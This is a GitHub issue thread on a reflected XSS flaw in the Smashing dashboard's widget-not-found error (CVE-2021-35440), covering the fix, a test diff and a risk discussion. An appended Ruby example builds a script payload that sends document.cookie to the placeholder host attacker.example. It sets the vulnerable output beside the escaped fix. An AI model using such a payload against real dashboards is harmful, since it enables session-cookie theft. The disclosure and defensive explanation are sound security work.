Closed gebhardtr closed 3 years ago
@gebhardtr looks like it's rack-test that's unhappy with the URL in the get call. I've applied the suggestion from this issue and it fixed the build on this PR.
Also confirmed that the test with this change was failing in the master branch.
Minitest::Assertion: --- expected
+++ actual
@@ -1,2 +1 @@
-# encoding: ASCII-8BIT
-"Drats! Unable to find a widget file named: nowidget-<h1> to render."
+"Drats! Unable to find a widget file named: nowidget-<h1> to render."
Let me know if you agree with the fix. Also, I'll prepare a release once it's merged, and will include this as a security bug. Let me know if you are OK with your name appearing as reporter for the bug :)
Thanks! Bruno
Absolutely! Thank you very much, @kinow.
Fix released.
The easiest way to exploit this issue is probably by sending a malicious URL to someone with access to the dashboard. That way the executed code could be used to run malicious JS in Smashing that could be used to steal session cookies or other sensitive data.
Most browsers protect against attacks like this, but there is no guarantee a browser or extension would prevent it. However, secure cookies, and cookies in other domains would not leak to this session, making it harder for an attacker to steal them.
I think the risk is greater if the dashboard is running on localhost for development, or maybe in a subdomain like dashboards.domain.com, and somehow there are cookies from domain.com available to the session.
Thanks again for reporting it @gebhardtr. CVE-2021-35440 will be updated and published soon.
Bruno
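The attack path Bruno describes above, as an added Ruby example that is not Smashing's own code and not part of the thread. It assumes the widget name in the "Drats! ..." error text is taken from a path segment of the request URL (the `/views/<name>.html` route shape is an assumption), builds a constructed malicious link whose JavaScript exfiltrates `document.cookie` to a placeholder host, and contrasts the unescaped message with one passed through `CGI.escapeHTML`, which is the kind of fix the test diff in this thread reflects. The `attacker.example` host and the payload are constructed for the example.

```ruby
require "cgi"
require "erb"

# Reconstruction for illustration, not Smashing's code: the thread shows the
# error text "Drats! Unable to find a widget file named: <name> to render.",
# so we assume <name> arrives straight from the request URL.
ERROR_TEMPLATE = "Drats! Unable to find a widget file named: %s to render."

# Vulnerable form: the attacker-controlled name is interpolated into the
# HTML response body unchanged, so markup in the name is rendered live.
def widget_not_found_vulnerable(widget)
  format(ERROR_TEMPLATE, widget)
end

# Fixed form: HTML-escape the name before it reaches the response body.
# "<h1>" becomes "&lt;h1&gt;", which the browser shows as text, not markup.
def widget_not_found_fixed(widget)
  format(ERROR_TEMPLATE, CGI.escapeHTML(widget))
end

# Extract and percent-decode the widget name from a request path such as
# "/views/nowidget-%3Ch1%3E.html". The route shape is an assumption.
def widget_name_from_path(path)
  segment = path.split("/").last.to_s
  CGI.unescape(segment.delete_suffix(".html"))
end

# Constructed malicious link of the kind the thread describes: the script
# sends document.cookie to a host the attacker controls (placeholder domain).
# Only cookies readable from the dashboard's own origin by document.cookie
# are exposed; HttpOnly cookies and cookies for other domains are not.
PAYLOAD = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"
MALICIOUS_PATH = "/views/nowidget-#{ERB::Util.url_encode(PAYLOAD)}.html"

# Crude stand-in for "would the browser execute this": does the body
# still contain an unescaped opening <script> tag?
def contains_live_script?(html)
  html.match?(/<script[\s>]/i)
end

if __FILE__ == $PROGRAM_NAME
  name = widget_name_from_path(MALICIOUS_PATH)
  puts "decoded widget name: #{name}"
  puts "vulnerable response: #{widget_not_found_vulnerable(name)}"
  puts "fixed response:      #{widget_not_found_fixed(name)}"
end
```

Sending `MALICIOUS_PATH` to someone logged in to the dashboard is the whole attack: the vulnerable response carries the live `<script>` tag, while the fixed response carries `&lt;script&gt;` and nothing executes. The escaping belongs at the point where the name is written into HTML, not at URL decoding, since the same name could reach other templates.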
To test, visit: